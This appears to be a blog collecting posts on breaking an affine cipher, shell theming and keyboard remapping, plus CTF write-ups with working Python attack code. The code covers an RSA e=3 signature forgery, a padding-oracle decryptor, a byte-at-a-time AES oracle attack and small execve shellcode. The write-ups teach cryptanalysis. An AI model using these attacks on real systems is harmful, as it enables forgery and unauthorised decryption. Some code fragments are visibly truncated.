Breaking affine ciphers – a matrix approach

An affine cipher is a one the remnants of classical cryptography, easily broken with todays computational power. The cipher defines a symbol mapping from f :\{A,B,\ldots,\} \mapsto \mathbb{Z}_n. Each cipher symbol is then computed as a \cdot x + b \rightarrow y, where a \in \mathbb{Z}^*_n and b \in \mathbb{Z}_n. Decryption is then done by computing x= (y - b) \cdot a^{-1}.

In this blog post, I will show how to break this cipher in time faster than trying all keys. Let us first sketch the general idea. Consider an expected distribution \hat{P} of the symbols and a given distribution P, the integral \int (\hat{P}(x) - P(x))^2 dx defines a statistical distance between the distributions (this would correspond to the Euclidian distance), which we would like to minimize. Now, clearly

(\hat{P}(x) - P(x))^2 = \hat{P}(x)^2 - \hat{P}(x)P(x) + P(x)^2.

Trivially, \hat{P}(x)^2 and P(x)^2 remains constant over any keypair (a,b), so instead of minimizing the above, we can maximize \hat{P}(x)P(x). Therefore, the minimization problem can be turned into a maximization problem \max_{a,b} \int \hat{P}(x)P_{a,b}(x) dx. Cool.

In terms of our cipher, which is discrete, the minimization problem is a sum \max_{a,b} \sum \hat{P}(x)P_{a,b}(x). The observant reader may notice that this looks like a term in a matrix multiplication. There is just one caveat; the indices corresponding appear only in one term. There is an easy way to get around this. Instead of applying transformations on only P, we may split them among the two. So by instead computing

\max_{a,b} \sum \hat{P}_a(x) P_{b}(x),

we have achieved what we desired. This means that we shuffle \hat{P} with a and {P} with b. Let us interpret this as Python. The expected distribution of an alphabet ABCDEFGHIJKLMNOPQRSTUVWXYZ ,. may be as follows (depending on the observation):

P_hat = {' ': 0.05985783763561542, ',': 0.0037411148522259637, '.': 0.0028058361391694723, 'A': 0.0764122708567153, 'C': 0.02600074822297044, 'B': 0.012065095398428732, 'E': 0.11878039655817432, 'D': 0.03974934530490086, 'G': 0.018892630003741116, 'F': 0.020856715301159744, 'I': 0.0651889263000374, 'H': 0.05695847362514029, 'K': 0.00720164609053498, 'J': 0.0014029180695847362, 'M': 0.02254021698466143, 'L': 0.03769173213617658, 'O': 0.07023943135054246, 'N': 0.06313131313131314, 'Q': 0.0009352787130564909, 'P': 0.01805087916199027, 'S': 0.05920314253647587, 'R': 0.0560231949120838, 'U': 0.025813692480359144, 'T': 0.08473625140291807, 'W': 0.022072577628133184, 'V': 0.00916573138795361, 'Y': 0.01842499064721287, 'X': 0.0014029180695847362, 'Z': 0.0006546950991395436}

The transformations are done by computing the matrices

# compute first matrix for transformed P_hat
for i in range(1, N):
    for element in priori_dist:
        X[i, (look_up.index(element) * i) % N] = priori_dist[element]

# compute second matrix for transformed P
for j in range(N):
    for element in dist:
        Y[(look_up.index(element) - j) % N, j] = dist[element]

Here, the ith row in X corresponds to \hat{P} transformed by a = i. Moreover, the jth row in Y corresponds {P} transformed by b = j.

For some distribution, they may look like


As we can see, X is only shifted (by the addition), while in Y the indices are reordered by multiplication with row index i. Taking advantage of the matrix multiplication property, we may now compute Z=XY.


Any entry in Z is Z_{a,b} = \sum_x X_{a,x} Y_{x,b} so finding a maximum element in Z is equivalent to saying

\max_{a,b} \sum_x X_{a,x} Y_{x,b}.

Looks familiar? It should. This is our maximization problem, which we stated earlier.

Therefore, we may solve the problem using

Z =, Y)
a, b = numpy.unravel_index(Z.argmax(), Z.shape)

This breaks the affine cipher.

Some notes on complexity

So, what is the complexity of the matrix approach? Computing the matrices takes O(N^2) modular operations. The matrix multiplication takes naively O(N^3) operations, but for large N this can be achieved faster. For instance Strassen takes O(N^{2.807}) but faster algorithms exist. Also, taking advantage of symmetry and structure could probably decrease the complexity further. This is the total complexity of this approach.

Compare this with brute-force guessing of the key (taking O(N^2) guesses) and for each guess, compute the distance taking O(N) operations, which in total yields O(N^3). It should be noted that complexity of this approach may be reduced by picking a,b in an order which minimizes the number of tries.

Example implementation for the github

Custom terminal for Vagrant/SSH

Short story: I wanted to distinguish my terminal windows between local sessions, ssh sessions and vagrant sessions.


set_th () {
  osascript -e "tell app \"Terminal\" to set current settings of first window to settings set \"$1\""

set_id () {
  osascript -e "tell app \"Terminal\" to set current settings of first window to $1 $2 $3 $4" #$@ does not work!

get_id () {
  cur_id=$(osascript -e "tell app \"Terminal\" to get current settings of first window")

    set_th $SSH_THEME
    /usr/bin/ssh "$@"
	set_id $cur_id

	if [ $1 = "ssh" ]; then
	    set_th $VAGRANT_THEME
	    /opt/vagrant/bin/vagrant "$@"
		set_id $cur_id
		/opt/vagrant/bin/vagrant "$@"

The code creates a temporary variable of the current theme before switching. So, when ending the session, the original theme changes back instead of a fixed one.
Putting the above code in your .bash_profile: gives the following nice behavior:

Color coding your sessions is a great way to visualize things and make sure you do not take any unwanted action by mistake 🙂

Of course, the code can be used to wrap any application. For instance, one could use it to make the interactive interpreter of Python/Sage or terminal sessions using torsocks appear in different colors or even fonts.

Re-mapping KBT Pure Pro in OS X

For my everyday-use computer, I use a modded KBT Pure Pro; this is a small mechanical keyboard with aluminium base and background lightning, perfect for programming and typing. The size of the keyboard is 60 % of a normal one, making it suitable for spatially constrained workspaces. To my experience, it is also more ergonomic. Below is a comparison of the Pure Pro and a wireless Apple keyboard. For those being the in the process of buying a keyboard, I recommend this one 🙂


For quite a while, I have used Linux on this computer. But after installing OS X, the keyboard map went wack, so to speak. Many keys were mapped incorrectly. Using Ukulele, I created a customized layout with correct mapping (don’t mind the duplicate keys):

Screen Shot 2016-06-15 at 13.43.21

The layout covers all keys and can be found here. NOTE: this is a layout for KBT Pure Pro with British ISO layout and not ANSI.

BackdoorCTF16 – Collision Course

With 350 points and a description as follows:

In today’s world, hash collisions are becoming more and more popular. That is why, one must rely on standardized hashing techniques, such as bcrypt. However, n00bster shall never learn, and he has implemented his own hash function which he proudly calls foobar. Attached is an implementation of the hash function and a file with which you are supposed to find a collision. He believes that you will not be able to find a collision for the file, especially since he hasn’t even given you the hashing algorithm, but has packaged it as a black box application. Prove to him that he is wrong.

Note: Multiple collisions are possible, but only one of them is a valid flag.
You will realize you’ve gotten it once you do.

The hash is given as follows:

Screenshot 2016-06-05 11.21.01

So, we start off by looking at the binary. Using Hopper, we obtain the following pseudo code by decompilation:

int hash(int input) {
    eax = _rotr(input ^ 0x24f50094, 
               (input ^ 0x24f50094) & 0xf);
    eax = _rotl(eax + 0x2219ab34, 
                eax + 0x2219ab34 & 0xf);
    eax = eax * 0x69a2c4fe;
    return eax;
int main() {
    esp = (esp & 0xfffffff0) - 0x20;
    stack[2039] = "\nBar:";
    while (stack[2039] < *(esp + 0x18)) {
            stack[2039] = *(stack[2039] + 
                            stack[2039] * 0x4);
            *(esp + 0x14) = *(esp + 0x14) ^ 
            eax = _rotr(stack[2039], 0x7);
            printf("%08lx", stack[2039]);
            *(esp + 0x10) = *(esp + 0x10) + 0x1;
    eax = putchar(0xa);
    return eax;

We sketch the above code as block scheme below:

Skärmavbild 2016-06-05 kl. 16.31.19

The first thing to note is that we can find an infinite number of collisions just by appending arbitrary data after 10 blocks. However, this is not interesting to us, but completely defeats the conditions for a safe cryptographic hash function.

This Merkle-Damgård-like structure allows us to solve blocks iteratively, starting from the first. Here is how. Starting from the first block, we can find an input to the function H such that when rotated 7 steps is equal to block 0 (here, denoted B_0). Hence, the problem we solve is to find an x such that H(x) \ll 7 = B_0. This is a simple thing for Z3. Then, we take the next block and solve for (H(x) \oplus B_0) \ll 7 = B_1 and so forth. Implemented in Python/Z3, it may look like the following:

from z3 import *
import binascii, string, itertools
bits = 32
mask = 2**bits - 1
allowed_chars = string.printable
def convert_to_hex(s):
   return ''.join([hex(ord(x))[2:].zfill(2) for x in s[::-1]])
def convert_to_string(h):
   return ''.join([chr(int(x, 16)) for x in list(map(''.join, zip(*[iter(hex(h)[2:])]*2)))[::-1]])
def rot(val, steps):
   return (val << (bits-steps)) | LShR(val, steps)
def hash_foobar(input):
   eax = rot(input ^ 0x24f50094, (input ^ 0x24f50094) & 0xf)
   eax = rot(eax + 0x2219ab34, bits - (eax + 0x2219ab34 & 0xf))
   eax = eax * 0x69a2c4fe
   return eax & mask
def break_iteratively(hashdata, i):
   if i == 0: prev_block = 0
   else: prev_block = hashdata[i-1]
   s = Solver()
   j = BitVec('current_block', bits)
   eax = rot(prev_block ^ hash_foobar(j), 7)
   s.add(eax == hashdata[i])
   block_preimages = []
   while s.check() == sat:
       sol = s.model()
       s.add(j != sol[j].as_long())
       block_string = convert_to_string(sol[j].as_long())
       if all(c in allowed_chars for c in block_string):
   return block_preimages
known = '9513aaa552e32e2cad6233c4f13a728a5c5b8fc879febfa9cb39d71cf48815e10ef77664050388a3' # this the hash of the file
data = list(map(''.join, zip(*[iter(known)]*8)))
hashdata = [int(x, 16) for x in data]
print '[+] Hash:', ''.join(data)
print '[+] Found potential hashes:\n'
for x in itertools.product(*[break_iteratively(hashdata, i) for i in range(10)]):
   print ' * ' + ''.join(x)

This code is surprisingly fast, thanks to Z3, and runs in 0.3 seconds. Taking all possible collisions into consideration…

[+] Hash: 9513aaa552e32e2cad6233c4f13a728a5c5b8fc879febfa9cb39d71cf48815e10ef77664050388a3
[+] Found potential hashes:

 * CTFEC0nstra1nts_m4keth_fl4g}
 * CTFEC0nstra1nts_m4keth_nl4g}
 * CTFEC0nstra1nws_m4keth_fl4g}
 * CTFEC0nstra1nws_m4keth_nl4g}
 * CTFEC0nstra9nts_m4keth_fl4g}
 * CTFEC0nstra9nts_m4keth_nl4g}
 * CTFEC0nstra9nws_m4keth_fl4g}
 * CTFEC0nstra9nws_m4keth_nl4g}
 * CTF{C0nstra1nts_m4keth_fl4g}
 * CTF{C0nstra1nts_m4keth_nl4g}
 * CTF{C0nstra1nws_m4keth_fl4g}
 * CTF{C0nstra1nws_m4keth_nl4g}
 * CTF{C0nstra9nts_m4keth_fl4g}
 * CTF{C0nstra9nts_m4keth_nl4g}
 * CTF{C0nstra9nws_m4keth_fl4g}
 * CTF{C0nstra9nws_m4keth_nl4g}

…we finally conclude that the flag is the SHA-256 of C0nstra1nts_m4keth_fl4g.

BackdoorCTF16 – Baby

Worth 200 points, this challenge was presented with the following:

z3r0c00l has a safe repository of files. The filename is signed using z3r0c00l’s private key (using the PKCS-1 standard). Anyone willing to read a file, has to ask for a signature from z3r0c00l. But z3r0c00l is currently unavailable.

Can you still access a file named “flag” on z3rc00l’s repository?

nc 9001

Let us take a look at the public key… 3072 bits and public exponent e = 3. Hmm… having a small exponent is usually not a good practice. First, I tried computing the roots to x^3 - s \bmod n, where s is the signature and n is the modulus, but then I realized that this was not the way to go. What if we use non-modular squareroot, plain old Babylonian style? After looking around, I also realized that this is Bleicherbacher’s e = 3 attack, which I probably should have known about. There is a lot of information about this attack (therefore, I will not describe it here) and, of course, lots of people have already written code for this. Being lazy/efficient, I rewrote a functional code into the the following:

from libnum import *
from gmpy2 import mpz, iroot, powmod, mul, t_mod
import hashlib, binascii, rsa, os
def get_bit(n, b):
    """ Returns the b-th rightmost bit of n """
    return ((1 << b) & n) >> b
def set_bit(n, b, x):
    """ Returns n with the b-th rightmost bit set to x """
    if x == 0: return ~(1 << b) & n
    if x == 1: return (1 << b) | n
def cube_root(n):
    return int(iroot(mpz(n), 3)[0])
snelhest = hashlib.sha256('flag')
ASN1_blob = rsa.pkcs1.HASH_ASN1['SHA-256']
suffix = b'\x00' + ASN1_blob + snelhest.digest()
sig_suffix = 1
for b in range(len(suffix)*8):
    if get_bit(sig_suffix ** 3, b) != get_bit(s2n(suffix), b):
        sig_suffix = set_bit(sig_suffix, b, 1)
while True:
    prefix = b'\x00\x01' + os.urandom(3072//8 - 2)
    sig_prefix = n2s(cube_root(s2n(prefix)))[:-len(suffix)] + b'\x00' * len(suffix)
    sig = sig_prefix[:-len(suffix)] + n2s(sig_suffix)
    if b'\x00' not in n2s(s2n(sig) ** 3)[:-len(suffix)]: break
print hex(s2n(sig))[2:-1]

Ok, so lets try it:

Screenshot 2016-06-05 16.15.09


Defcon CTF – b3s23 (partial?)

The server runs a program (game of life) which has a 110 \times 110 board with cells (bits). After a fixed number n of iterations, the simulation stops and the program jumps to the first bit of the memory containing the board. We want to create an input which contains shellcode in this area after n iterations. Obviously, we could choose any shellcode, and run game of life backwards. Cool, let us do that then! Uh-oh, inverting game of life is in fact a very hard problem… so it is not really feasible 😦

What to do, then?

Game of life

Game of life a cellular automata, found by Jon Conway, and is based on the following rules:

  1. A cell is born if it has exactly 3 neighbours. Neighbors are defined as adjacent cells in vertical, horistontal and diagonal.
  2. A cell dies if it has less than two or more than three neighbors.


Stable code (still life)

Still life consists of cell structures with repeating cycles having period 1. Here are the building blocks I used to craft the shellcode.

Skärmavbild 2016-05-22 kl. 12.51.08     Skärmavbild 2016-05-22 kl. 12.51.19    Skärmavbild 2016-05-22 kl. 12.51.57

Of course, the still life is invariant of rotation and mirroring.

So, I tried to find the shortest shellcode that would fit one line (110 bits). This one is 8 bytes. Great.

08048334 <main>:
 8048334:   99                cltd
 8048335:   6a 0b             push   $0xb
 8048337:   58                pop    %eax
 8048338:   60                pusha
 8048339:   59                pop    %ecx
 804833a:   cd 80             int    $0x80

In binary, this translates to:


Ok, so we note that

110101 ... 01110

cannot be constructed by our building blocks (there most certainly exist such blocks, but I didn’t consider them). So, I use a padding trick. By inserting an operation which does nothing specific

10110011 00000000    mov    bl,0x0

we are able to use the blocks given in previous section. This Python code gives the binary (still-life-solvable) sequence:

from pwn import *
pad = '\xb3\x00'
shellcode = '\x06\x99' + pad + '\x6a\x0b\x58\x60\x59' + pad + '\xcd\x80'
binary_data = ''.join([bin(ord(opcode))[2:].zfill(8) for opcode in shellcode])
context(arch = 'i386', os = 'linux')
print disasm(shellcode)
print binary_data[0:110]

which is


The following cellular automata is stable, and the first line contains our exploit:

Skärmavbild 2016-05-22 kl. 12.56.38

As can be seen in the animation below, we have found a still-life shellcode.


When feeding it to the program, we find that it remains in memory after any number of iterations:

Skärmavbild 2016-05-22 kl. 12.40.41

Nice! Unfortunately, the code did not give me a shell, but at least the intended code was executed. I had a lot of fun progressing this far 🙂

TU CTF – Secure Auth

This was a 150 point challenge with the description:

We have set up this fancy automatic signing server!
We also uses RSA authentication, so it’s super secure!

nc 54321

Connecting to the service, we get the following

screenshot 2016-05-14 01.39.35

Obviously, we cannot feed the message get_your_hands_off_my_RSA! to the oracle. So, we will only receive signatures, but no way to verify them; this means we don’t know either the public modulus, nor the public exponent. But, of course, we could guess the public exponent… there are a few standard ones: 3, 17, 65537...

First, I obtained the signatures for 3 and 4 from the provided service. Denote these s_3, s_4, respectively. We note that given a correct public exponent e, we may compute s_3^e = 3 + k \cdot N and s_4^e = 4 + l \cdot N. Inevitably, \textnormal{gcd}(s_3^e-3,s_4^e-4) = \textnormal{gcd}(k,l)\cdot N. Hoping for \textnormal{gcd}(k,l) to be small, we can use serveral pairs until we find one that works.

Trying all the listed (guessed) public exponents, we find that e = 65537 (this was performed surprisingly fast in Sage with my Intel hexacore). Hence, we have now determined the modulus

\begin{array}{rl} N = & 24690625680063774371747714092931245796723840632401231916590850908498671935961736 \\ &33219586206053668802164006738610883420227518982289859959446363584099676102569045 \\ &62633701460161141560106197695689059405723178428951147009495321340395974754631827 \\ &95837468991755433866386124620786221838783092089725622611582198259472856998222335 \\ &23640841676931602657793593386155635808207524548748082853989358074360679350816769 \\ &05321318936256004057148201070503597448648411260389296384266138763684110173009876\\ &82339192115588614533886473808385041303878518137898225847735216970008990188644891 \\ &634667174415391598670430735870182014445537116749235017327.\end{array}

Now, note that

libnum.strings.s2n('get_your_hands_off_my_RSA!') % 3 == 0

OK, so we may split this message m into a product of two message factors: m_1 = 3 and m_2 = 166151459290300546021127823915547539196280244544484032717734177 and sign them. Then, we compute the final signature s = m^d = (m_1 \cdot m_2)^d = m_1^d \cdot m_2^d = s_1 \cdot s_2 \bmod N. Mhm, so what now?

Screenshot 2016-05-15 12.13.41

Phew 🙂

TU CTF – Hash’n’bake

This challenge, worth 200 points, exhibits a trivial (and, obviously, non-secure) hash function with the objective to find a keyed hash. The description:

A random goat from Boston hashed our password!
Can you find the full output?

The hash function is defined as:

def to_bits(length, N):
    return [int(i) for i in bin(N)[2:].zfill(length)]
def from_bits(N):
    return int("".join(str(i) for i in N), 2)
CONST2 = to_bits(65, (2**64) + 0x1fe67c76d13735f9)
CONST = to_bits(64, 0xabaddeadbeef1dea)
def hash_n_bake(mesg):
    mesg += CONST
    shift = 0
    while shift < len(mesg) - 64:
        if mesg[shift]:
            for i in range(65):
                mesg[shift + i] ^= CONST2[i]
        shift += 1
    return mesg[-64:]
def xor(x, y):
    return [g ^ h for (g, h) in zip(x, y)]

The following computations will give the hash

PLAIN_1 = "goatscrt"
PLAIN_2 = "tu_ctf??"
def str_to_bits(s):
    return [b for i in s for b in to_bits(8, ord(i))]
def bits_to_hex(b):
    return hex(from_bits(b)).rstrip("L")
if __name__ == "__main__":
    with open("key.txt") as f:
        KEY = to_bits(64, int("\n"), 16))
    print PLAIN_1, "=>", bits_to_hex(hash_n_bake(xor(KEY, str_to_bits(PLAIN_1))))
    print "TUCTF{" + bits_to_hex(hash_n_bake(xor(KEY, str_to_bits(PLAIN_2)))) + "}"
#  Output
#  goatscrt => 0xfaae6f053234c939
#  TUCTF{****REDACTED****}

So, the problem is: we need to compute the hash without knowing the key (or brute forcing it). The first observation we make is that the hash function is a truncated affine function, i.e., h(m) = f((m \cdot 2^{64} \oplus \texttt{CONST})\cdot \texttt{CONST}_2), with f(a \oplus b) = f(a) \oplus f(b) . There is a quite simple relation emerging: h(k \oplus m) = h(k) \oplus h(m) \oplus h(0) (note: h(0) denotes empty input here). Using this relation, we can do the following. We know h(k \oplus m_1) and h(m_2) and want to determine h(k \oplus m_2). Consider the following relation:

\begin{array}{rl} h(k \oplus m_2) = & h(k) \oplus h(m_2) \oplus h(0) \\ = & h(k) \oplus h(m_1) \oplus h(0) \oplus h(m_1) \oplus h(m_2) \phantom{\bigg(} \\ = & h(k \oplus m_1) \oplus h(m_1) \oplus h(m_2). \end{array}

All terms on the last line of the above equation are known. So, we can easily compute the hash, even without knowing the key. Ha-ha! Computing the above relation using Python can be done in the following manner:

xor(xor(to_bits(64, 0xfaae6f053234c939), hash_n_bake(str_to_bits(PLAIN_1))),hash_n_bake(str_to_bits(PLAIN_2)))

This gives the flag TUCTF{0xf38d506b748fc67}. Sweet 🙂

TU CTF – Pet Padding Inc.

A web challenge worth 150 points, with description

We believe a rouge whale stole some data from us and hid it on this website. Can you tell us what it stole?

Visiting the site, we see that there is a cookie youCantDecryptThis. Alright… lets try to fiddle with it.

Skärmavbild 2016-05-15 kl. 11.18.51

We run the following command
curl -v --cookie "youCantDecryptThis=aaaa"
and we observe that there is an error which is not present compared to

Skärmavbild 2016-05-15 kl. 11.36.32

when running it with the correct cookie is set, i.e.,
curl -v --cookie "youCantDecryptThis=0KL1bnXgmJR0tGZ/E++cSDMV1ChIlhHyVGm36/k8UV/3rmgcXq/rLA=="

Skärmavbild 2016-05-15 kl. 11.36.59

Clearly, this is a padding error (actually, there is an explicit padding error warning but it is not shown by curl). OK, so decryption can be done by a simple padding oracle attack. This attack is rather simple to implement (basically, use the relation P_i = D_K(C_i) \oplus C_{i-1} and the definition of PCKS padding, see the wikipedia page for a better explanation), but I decided to use PadBuster. The following (modified example) code finds the decryption:

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        somecookie = quote(b64encode(data))
        print somecookie
        self.session.cookies['youCantDecryptThis'] = somecookie

        while 1:
                response = self.session.get('',
                        stream=False, timeout=5, verify=False)
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)

        if 'warning' not in response.headers:
            logging.debug('No padding exception raised on %r', somecookie)

        raise BadPaddingException

if __name__ == '__main__':
    import logging
    import sys
    encrypted_cookie = b64decode('0KL1bnXgmJR0tGZ/E++cSDMV1ChIlhHyVGm36/k8UV/3rmgcXq/rLA==')
    padbuster = PadBuster()
    cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))
    print('Decrypted somecookie: %s : %r' % (sys.argv[1], cookie))

The decrypted flag we get is TUCTF{p4dding_bec4use_5ize_m4tt3rs}!

Byte-wise decryption of AES-CBC

The journey continues. This time, I am looking at AES-CBC. Consider the scenario where we have an encryption oracle such that outputs ciphertexts \Pi(s) = \textsf{Enc}_\text{AES}(s \| d, k) \rightarrow c, where \| denotes concatenation. The oracle uses PKCS7 padding and encrypts with fixed but unknown key k and IV. The CBC-mode of operation is defined as follows:
Skärmavbild 2016-05-01 kl. 19.35.44
Embodied in Python code, the oracle is

from Crypto.Cipher import AES
import base64
import random

plaintext = b'''This is an encrypted message.'''
key = None
cprefix = None
iv = None

def randbytes(k):
    return open('/dev/urandom').read(k)

def pkcs7pad(s,blksize=16):
  missing = abs(len(s) - (len(s)/blksize+1) * blksize)
  return s+(chr(missing)*missing)

def encryption_oracle(s):
    global key
    global iv
    if key is None:
        key = randbytes(16)
    if iv is None:
        iv = randbytes(16)
    cipher =, AES.MODE_CBC, IV=iv)
    s = pkcs7pad(bytes(s) + plaintext, 16)
    return cipher.encrypt(s)

So, for instance, when querying the oracle with \Pi(\texttt{We can break this!}), we obtain the encryption of \texttt{We can break this!This is an encrypted message.} We note the following:

  1. If the input is a fixed string, say, q = \texttt{aaaaaaaaaaaaaaa}, with length 15 bytes (blocklength-1), we will include exactly one byte from the (unknown) plaintext d. This block will be independent of the subsequent unknown plaintext bytes. For the sake of simplicity, assume that IV= \texttt{0x0}.
  2. So, if we query the oracle for all 256 strings \texttt{aaaaaaaaaaaaaaa}\|x, where x runs over all possible bytes, we can compute a look-up table.
  3. We may then look at our first encryption and, using the look-up table from before, see which x that satisfies the first block of \Pi(q). This determines the first byte of d.
  4. This may repeated in several steps, until we find all bytes in the first block. Let us return to the IV issue implicitly stated earlier. We do not know the IV, but does that really matter? No! The IV will be constant in the first block and, thus, the input string fed into it. Now, as long as we can control the IV in the coming block (keep it constant), it has no effect on the result.
  5. Using the same padding methodology as before, we may now compute the bytes of the coming block, but looking at the next block.

Again, with Python as our weapon of choice, we impale the decryption problem as follows

def attack(blocksize, known):
    index = len(known) / blocksize
    prefix = 'a'*(blocksize-len(known)%blocksize-1)
    lookup = {}    
    for char in range(0, 256): 
        lookup[encryption_oracle(prefix+known+chr(char))[index*16:index*16+16]] = chr(char)
    substring = encryption_oracle(prefix)[16*index:16*index+16]
    if lookup.has_key(substring):
        return lookup[substring]
        return None

Running this until we obtain a None-flag, i.e.,

plain = ''
while attack(16, plain) != None:
    plain += attack(16, plain)
print 'Found plaintext:\n', plain

we obtain the sought plaintext \texttt{This is an encrypted message.}!